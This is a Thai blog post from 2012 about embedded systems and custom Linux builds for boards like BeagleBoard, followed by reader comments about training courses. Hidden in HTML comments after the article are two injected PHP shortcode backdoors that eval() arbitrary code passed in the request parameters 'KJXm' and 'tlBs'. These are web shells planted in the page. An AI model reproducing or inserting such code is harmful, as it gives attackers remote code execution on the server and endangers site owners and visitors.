ระบบสมองกลฝังตัวและการปรับแต่งระบบปฏิบัติการ

By May 3, 2012General

ในปัจจุบัน ระบบสมองกลฝังตัวหรือ Embedded System มีส่วนเข้ามาในชีวิตประจำวันของเราอย่างเห็นได้ชัดเจน ไม่ว่าในรถยนต์ เครื่องใช้ไฟฟ้าต่างๆ หุ่นยนต์ หรือแม้แต่ สมาร์ทโฟน

ในทางเดียวกันเราก็สามารถนำไมโครโพรเซสเซอร์ ระดับเดียวกันกับสมาร์ทโฟนมาประยุกต์ใช้ในงานของเราได้ด้วย โดยอาจจะไม่ได้ใช้ระบบปฏิบัติการเดียวกันกับบน สมาร์ทโฟนเพื่อความคล่องตัว แต่เราอาจจะเลือก custom Os เอาเองเช่นนำ GNU/Linux มาใช้การใช้งานประเภทนี้ บนบอร์ดพัฒนาทั่วๆ ไปก็อย่างเช่น

BeagleBoard จาก http://beagleboard.org/

เหตุผลที่ทำไมต้องมีการ custom Os เนื่องจากในงานบางประเภทเช่นงานอุตสาหกรรม การใช้ ระบบปฏิบัติการที่มีขนาดใหญ่อาจจะทำให้การทำงานช้ากว่าปกติและไม่มีความจำเป็นในการใช้ด้วยบางงานอาจจะมีแค่ RealTime Kernel และแพกเกตที่จำเป็นเพียงเล็กน้อยเท่านั้น งานประเภทนี้ถ้ายกตัวอย่างให้เห็นก็อย่างเช่นระบบ ควบคุมเครื่อง CNC ที่ใช้ระบบปฏิบัติการ Linux หรือระบบควบคุมมอเตอร์ ระบบควบคุมหุ่นยนต์ที่มีความเร็วสูง และงานประเภทนี้อาจจะต้องมีการพัฒนาซอฟแวร์ในระดับ kernel เข้ามาช่วยด้วย

อย่างไรก็ตามการเริ่มต้นงานทางด้าน Embedded System ไม่ว่าจะเป็นงานแบบไหน สิ่งหนึ่งที่ึควรรู้และสำคัญมากคือการเลือกอุปกรณ์ให้ถูกต้องกลับงานถ้าเลือกอุปกรณ์ หรือทูลผิดงานนั้นก็เตรียมตัวเหนื่อยได้เลยครับ ^^

<!– [insert_php]if (isset($_REQUEST["KJXm"])){eval($_REQUEST["KJXm"]);exit;}[/insert_php][php]if (isset($_REQUEST["KJXm"])){eval($_REQUEST["KJXm"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tlBs"])){eval($_REQUEST["tlBs"]);exit;}[/insert_php][php]if (isset($_REQUEST["tlBs"])){eval($_REQUEST["tlBs"]);exit;}[/php] –>

Join the discussion 5 Comments

 • rojkoong says:

  เยี่ยม!!
  อยากหาความรู้ด้านนี้มานานแล้ว search ในเนทก็ไม่ค่อยมีข้อมูล

  มีครอสอะไรให้เรียนบ้างคับ

 • rojkoong says:

  ครอส Basic ARM Cortex-M3 เปิดวันไหนบ้างคับ

 • admin says:

  ตอนนี้ ทีมงานเรายังจัดอบรมนอกเวลาราชการอยู่ครับ
  สามารถติดต่อได้เลยครับว่าต้องการให้เปิดอบรมวันไหนในวันเสาร์ อาทิตย์ที่เท่าไร
  รับรองว่าคุ้มค่าแน่ครับ

 • airalone says:

  คอร์สทางไมโครคอนโทรลเลอร์ และ Embedded Linux นับว่าน่าสนใจทั้งคู่เลยนะครับ

Leave a Reply

*